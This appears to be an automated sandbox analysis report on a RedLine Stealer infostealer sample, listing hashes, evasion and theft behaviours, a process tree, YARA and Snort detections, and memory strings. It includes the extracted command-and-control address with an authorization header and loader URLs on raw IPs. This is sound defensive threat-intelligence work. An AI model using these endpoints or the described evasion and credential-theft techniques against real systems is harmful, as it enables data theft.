Edit tour

Windows Analysis Report
1JCAVkYU3U.exe

Overview

General Information

Sample Name:	1JCAVkYU3U.exe
Original Sample Name:	719082dcc3c017e5b675c8b9ec74b6a1.exe
Analysis ID:	833919
MD5:	719082dcc3c017e5b675c8b9ec74b6a1
SHA1:	d189e585b338d3ce5d6f0c04e0ce94aa40343c6a
SHA256:	6a57409b5f4d0ae13167353c059ddf4b9fe7920647a119a70438dae02a35586e
Tags:	32exeRedLineStealertrojan
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Creates an autostart registry key pointing to binary in C:\Windows

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

AV process strings found (often used to terminate AV products)

File is packed with WinRar

Detected TCP or UDP traffic on non-standard ports

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

1JCAVkYU3U.exe (PID: 5296 cmdline: C:\Users\user\Desktop\1JCAVkYU3U.exe MD5: 719082DCC3C017E5B675C8B9EC74B6A1)

123.exe (PID: 5180 cmdline: "C:\Windows\Temp\123.exe" MD5: 067B24F2A101E4B49D45E14F81D41EDB)

RegSvcs.exe (PID: 5168 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

WerFault.exe (PID: 4580 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 232 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

321.exe (PID: 5152 cmdline: "C:\Windows\Temp\321.exe" MD5: 5B87AD276E221A90FF038CB69929F321)

RegSvcs.exe (PID: 6644 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

WerFault.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 220 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

RegSvcs.exe (PID: 7032 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)

conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegSvcs.exe (PID: 6460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)

conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html https://blog.avast.com/adobe-acrobat-sign-malware	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["51.210.161.21:36108"], "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.471223737.0000000000402000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000003.264083282.0000000000C92000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5168	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5168	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.3.123.exe.c90000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.123.exe.c90000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a4b4:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a4b4:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.2.123.exe.1c3a80.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.123.exe.1c3a80.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x188b4:$pat14: , CommandLine: 0x118a7:$v2_1: ListOfProcesses 0x11686:$v4_3: base64str 0x121ff:$v4_4: stringKey 0xff63:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x10498:$v4_8: procName 0x10c11:$v5_5: FileScanning 0x1016c:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.2.123.exe.1c3a80.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.123.exe.1c3a80.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a4b4:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.2.123.exe.190000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.123.exe.190000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x24820:$s5: delete[] 0x4cf34:$pat14: , CommandLine: 0x45f27:$v2_1: ListOfProcesses 0x45d06:$v4_3: base64str 0x4687f:$v4_4: stringKey 0x445e3:$v4_5: BytesToStringConverted 0x437f6:$v4_6: FromBase64 0x44b18:$v4_8: procName 0x45291:$v5_5: FileScanning 0x447ec:$v5_7: RecordHeaderField 0x444b4:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Click to see the 5 entries

Snort Signatures

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 51.210.161.21 - Destination IP: 192.168.2.6

Timestamp:	51.210.161.21192.168.2.636108497202043234 03/24/23-07:58:58.669638
SID:	2043234
Source Port:	36108
Destination Port:	49720
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN RedLine Stealer TCP CnC net.tcp Init - Source IP: 192.168.2.6 - Destination IP: 51.210.161.21

Timestamp:	192.168.2.651.210.161.2149720361082043233 03/24/23-07:58:52.952768
SID:	2043233
Source Port:	49720
Destination Port:	36108
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.6 - Destination IP: 51.210.161.21

Timestamp:	192.168.2.651.210.161.2149720361082043231 03/24/23-07:59:29.302517
SID:	2043231
Source Port:	49720
Destination Port:	36108
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://tempuri.org/Entity/Id19Responseon

URL Reputation: Label: phishing

Multi AV Scanner detection for submitted file

Source: 1JCAVkYU3U.exe	ReversingLabs: Detection: 45%
Source: 1JCAVkYU3U.exe	Virustotal: Detection: 30%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Windows\Temp\123.exe	ReversingLabs: Detection: 37%
Source: C:\Windows\Temp\321.exe	ReversingLabs: Detection: 36%

Machine Learning detection for sample

Source: 1JCAVkYU3U.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Windows\Temp\123.exe	Joe Sandbox ML: detected
Source: C:\Windows\Temp\321.exe	Joe Sandbox ML: detected

Source: 2.0.321.exe.1370000.0.unpack	Avira: Label: TR/ATRAPS.Gen4
Source: 1.2.123.exe.190000.0.unpack	Avira: Label: TR/ATRAPS.Gen4
Source: 1.0.123.exe.190000.0.unpack	Avira: Label: TR/ATRAPS.Gen4
Source: 6.2.RegSvcs.exe.40746cc.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.321.exe.1370000.0.unpack	Avira: Label: TR/ATRAPS.Gen4

Source: 3.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["51.210.161.21:36108"], "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Source: 1JCAVkYU3U.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49714 version: TLS 1.2

Source: 1JCAVkYU3U.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 1JCAVkYU3U.exe

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00B6A69B
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00B7C220
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B8B348 FindFirstFileExA,	0_2_00B8B348
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001AC80B FindFirstFileExW,	1_2_001AC80B
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0138C80B FindFirstFileExW,	2_2_0138C80B

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.6:49720 -> 51.210.161.21:36108
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.6:49720 -> 51.210.161.21:36108
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 51.210.161.21:36108 -> 192.168.2.6:49720

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 51.210.161.21 ports 0,1,36108,3,6,8

May check the online IP address of the machine

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

DNS query: name: ip-api.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 51.210.161.21:36108

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: global traffic

TCP traffic: 192.168.2.6:49720 -> 51.210.161.21:36108

Source: RegSvcs.exe, 00000006.00000002.531533948.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.252.73.140/
Source: RegSvcs.exe, 00000006.00000002.531533948.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.252.73.140/S
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.252.73.140/loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.252.73.140/loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys5
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.252.73.140/loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ysom
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegSvcs.exe, 00000006.00000002.532327427.000000000157E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000003.345197830.000000000156E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegSvcs.exe, 00000006.00000002.543163037.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.538488155.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, re.exe.6.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: RegSvcs.exe, 00000006.00000002.543163037.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.538488155.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, re.exe.6.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=query
Source: RegSvcs.exe, 00000003.00000003.470027471.000000000156B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.485919190.000000000156E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://ocsp.digicert.com0L
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegSvcs.exe, 00000006.00000002.543163037.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.538488155.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, re.exe.6.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
